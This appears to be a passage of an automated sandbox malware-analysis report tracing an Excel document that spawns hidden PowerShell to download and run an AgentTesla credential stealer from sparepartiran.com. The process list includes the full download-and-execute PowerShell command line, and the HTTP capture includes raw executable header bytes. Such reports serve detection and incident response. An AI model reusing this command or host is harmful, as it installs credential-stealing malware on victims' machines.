                                                                                                                                Nov 28, 2020 12:18:02.789433956 CET53615318.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:02.820564985 CET4922853192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:02.856061935 CET53492288.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:03.269885063 CET5979453192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:03.322135925 CET53597948.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:03.781374931 CET5591653192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:03.816895962 CET53559168.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:04.374922991 CET5275253192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:04.412796974 CET53527528.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:05.463407993 CET6054253192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:05.498944998 CET53605428.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:05.782862902 CET6068953192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:05.818725109 CET53606898.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:11.403021097 CET6420653192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:11.430073023 CET53642068.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:20.017014980 CET5090453192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:20.044274092 CET53509048.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:20.277533054 CET5752553192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:20.320477009 CET53575258.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:23.583074093 CET5381453192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:23.621932983 CET53538148.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:53.738651037 CET5341853192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:53.765880108 CET53534188.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:55.523910046 CET6283353192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:55.559830904 CET53628338.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:00.801029921 CET5926053192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:19:00.838619947 CET53592608.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:00.956459045 CET4994453192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:19:00.983701944 CET53499448.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:31.262310982 CET5315753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:19:31.289434910 CET53531578.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:31.354326010 CET6330053192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:19:31.390055895 CET53633008.8.8.8192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                Nov 28, 2020 12:19:00.801029921 CET192.168.2.48.8.8.80xbfbfStandard query (0)sparepartiran.comA (IP address)IN (0x0001)
                                                                                                                                Nov 28, 2020 12:19:00.956459045 CET192.168.2.48.8.8.80x3afbStandard query (0)sparepartiran.comA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                Nov 28, 2020 12:19:00.838619947 CET8.8.8.8192.168.2.40xbfbfNo error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)
                                                                                                                                Nov 28, 2020 12:19:00.983701944 CET8.8.8.8192.168.2.40x3afbNo error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • sparepartiran.com

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                0192.168.2.449788162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Nov 28, 2020 12:19:00.988123894 CET4093OUTGET /js/2Q/Jqeofcirr6.exe HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                Host: sparepartiran.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 28, 2020 12:19:01.110169888 CET4095INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 28 Nov 2020 11:19:01 GMT
                                                                                                                                Server: Apache
                                                                                                                                Last-Modified: Thu, 26 Nov 2020 22:28:12 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 518656
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 5e dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 dc 03 00 4b 00 00 00 00 e0 03 00 c8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 31 00 00 38 37 00 00 03 00 00 00 6e 00 00 06 dc 68 00 00 2a 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 42 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 3f 00 00 00 1c 00 00 00 1d 00 00 00 38 3a 00 00 00 02 28 04 00 00 06 20 01 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 2a 02 28 06 00 00 06 38 dd ff ff ff 02 28 02 00 00 06 20 00 00 00 00 17 3a b6 ff ff ff 26 38 ac ff ff ff 02 28 03 00 00 06 20 02 00 00 00 38 a0 ff ff ff 13 30 07 00 40 01 00 00 02 00 00 11 20 03 00 00 00 fe 0e 03 00 38 00 00 00 00 fe 0c 03 00 45 08 00 00 00 05 00 00 00 14 00 00 00 9b 00 00 00 c3 00 00 00 2f 00 00 00 d5 00 00 00 f9 00 00 00 d4 00 00 00 38 00 00 00 00 38 ef 00 00 00 20 04 00 00 00 38 c7 ff ff ff 73 1e 00 00 06 13 02 38 97 00 00 00 38 b0 00 00 00 20 06 00 00 00 38 ac ff ff ff 02 d0 04 00 00 01 28 02 00 00 0a 72 01 00 00 70 17 8d 05 00 00 01 13 05 11 05 16 d0 01 00 00 1b 28 0a 00 00 06 a2 11 05 28 03 00 00 0a 14 17 8d 02 00 00 01 13 04 11 04 16 11 02 28 0b 00 00 06 a2 11 04 6f 04 00 00 0a 74 04 00 00 01 7d 01 00 00 04 20 07 00 00 00 28 08 00 00 06 39 4b ff ff ff 26 20 00 00 00 00 38 40 ff ff ff 73 05 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 2a ff ff ff 26 38 20 ff ff ff 11 01 28 09 00 00 06 38 5d ff ff ff 20 d9 03 00 00 13 00 20 02 00 00 00 38 07 ff ff ff 2a 11 01 6f 06 00 00 0a 11 00 6a 3c 4b ff ff ff 20 00 00 00 00 28 08 00 00 06 39 e8 fe ff ff 26 38 de fe ff ff 17 28 07 00 00 0a 20 05 00 00 00 38 d2 fe ff ff 72 02 02 7b 01 00 00 04 72 0b 00 00 70 28 0c 00 00 06 7d 02 00 00 04 38 00 00
                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+_*^ @ @@K& H.textd `.rsrc&(@@.reloc @B@H187nh*s0t(8B8E?8:( :&8*(8( :&8( 80@ 8E/88 8s88 8(rp(((ot} (9K& 8@s (9*&8 (8] 8*oj<K (9&8( 8r{rp(}8


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                1192.168.2.449789162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Nov 28, 2020 12:19:01.123408079 CET4108OUTGET /js/2Q/Jqeofcirr6.exe HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                Host: sparepartiran.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 28, 2020 12:19:01.244685888 CET4137INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 28 Nov 2020 11:19:01 GMT
                                                                                                                                Server: Apache
                                                                                                                                Last-Modified: Thu, 26 Nov 2020 22:28:12 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 518656
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 5e dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 dc 03 00 4b 00 00 00 00 e0 03 00 c8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 31 00 00 38 37 00 00 03 00 00 00 6e 00 00 06 dc 68 00 00 2a 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 42 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 3f 00 00 00 1c 00 00 00 1d 00 00 00 38 3a 00 00 00 02 28 04 00 00 06 20 01 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 2a 02 28 06 00 00 06 38 dd ff ff ff 02 28 02 00 00 06 20 00 00 00 00 17 3a b6 ff ff ff 26 38 ac ff ff ff 02 28 03 00 00 06 20 02 00 00 00 38 a0 ff ff ff 13 30 07 00 40 01 00 00 02 00 00 11 20 03 00 00 00 fe 0e 03 00 38 00 00 00 00 fe 0c 03 00 45 08 00 00 00 05 00 00 00 14 00 00 00 9b 00 00 00 c3 00 00 00 2f 00 00 00 d5 00 00 00 f9 00 00 00 d4 00 00 00 38 00 00 00 00 38 ef 00 00 00 20 04 00 00 00 38 c7 ff ff ff 73 1e 00 00 06 13 02 38 97 00 00 00 38 b0 00 00 00 20 06 00 00 00 38 ac ff ff ff 02 d0 04 00 00 01 28 02 00 00 0a 72 01 00 00 70 17 8d 05 00 00 01 13 05 11 05 16 d0 01 00 00 1b 28 0a 00 00 06 a2 11 05 28 03 00 00 0a 14 17 8d 02 00 00 01 13 04 11 04 16 11 02 28 0b 00 00 06 a2 11 04 6f 04 00 00 0a 74 04 00 00 01 7d 01 00 00 04 20 07 00 00 00 28 08 00 00 06 39 4b ff ff ff 26 20 00 00 00 00 38 40 ff ff ff 73 05 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 2a ff ff ff 26 38 20 ff ff ff 11 01 28 09 00 00 06 38 5d ff ff ff 20 d9 03 00 00 13 00 20 02 00 00 00 38 07 ff ff ff 2a 11 01 6f 06 00 00 0a 11 00 6a 3c 4b ff ff ff 20 00 00 00 00 28 08 00 00 06 39 e8 fe ff ff 26 38 de fe ff ff 17 28 07 00 00 0a 20 05 00 00 00 38 d2 fe ff ff 72 02 02 7b 01 00 00 04 72 0b 00 00 70 28 0c 00 00 06 7d 02 00 00 04 38 00 00
                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+_*^ @ @@K& H.textd `.rsrc&(@@.reloc @B@H187nh*s0t(8B8E?8:( :&8*(8( :&8( 80@ 8E/88 8s88 8(rp(((ot} (9K& 8@s (9*&8 (8] 8*oj<K (9&8( 8r{rp(}8


                                                                                                                                Code Manipulations

                                                                                                                                Statistics

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Start time:12:17:31
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                Imagebase:0x8e0000
                                                                                                                                File size:27110184 bytes
                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:12:18:53
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                Imagebase:0x7ff6613b0000
                                                                                                                                File size:130560 bytes
                                                                                                                                MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:12:18:56
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                                                                                                                                Imagebase:0x7ff7bedd0000
                                                                                                                                File size:447488 bytes
                                                                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:12:18:57
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                                                                                                                                Imagebase:0x7ff7bedd0000
                                                                                                                                File size:447488 bytes
                                                                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:12:18:57
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff724c50000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:12:18:57
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff724c50000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:12:19:01
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Users\Public\raqfxwuo.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:'C:\Users\Public\raqfxwuo.exe'
                                                                                                                                Imagebase:0xe40000
                                                                                                                                File size:518656 bytes
                                                                                                                                MD5 hash:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.899909340.0000000004351000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.899751986.0000000003478000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 24%, Metadefender, Browse
                                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                                Reputation:low

                                                                                                                                General

                                                                                                                                Start time:12:19:02
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Users\Public\raqfxwuo.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:'C:\Users\Public\raqfxwuo.exe'
                                                                                                                                Imagebase:0x420000
                                                                                                                                File size:518656 bytes
                                                                                                                                MD5 hash:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.899832989.00000000028A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.900029197.0000000003781000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                General

                                                                                                                                Start time:12:19:20
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Users\Public\raqfxwuo.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\Public\raqfxwuo.exe
                                                                                                                                Imagebase:0x8a0000
                                                                                                                                File size:518656 bytes
                                                                                                                                MD5 hash:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.924181667.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                General

                                                                                                                                Start time:12:19:20
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Users\Public\raqfxwuo.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\Public\raqfxwuo.exe
                                                                                                                                Imagebase:0xa90000
                                                                                                                                File size:518656 bytes
                                                                                                                                MD5 hash:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.924149098.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                General

                                                                                                                                Start time:12:19:26
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                                                                                                                Imagebase:0xb80000
                                                                                                                                File size:518656 bytes
                                                                                                                                MD5 hash:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 24%, Metadefender, Browse
                                                                                                                                • Detection: 55%, ReversingLabs

                                                                                                                                General

                                                                                                                                Start time:12:19:35
                                                                                                                                Start date:28/11/2020
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                                                                                                                Imagebase:0x390000
                                                                                                                                File size:518656 bytes
                                                                                                                                MD5 hash:0998148D355B1E7BAD7B44558AA4C125
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                Disassembly

                                                                                                                                Code Analysis

                                                                                                                                Reset < >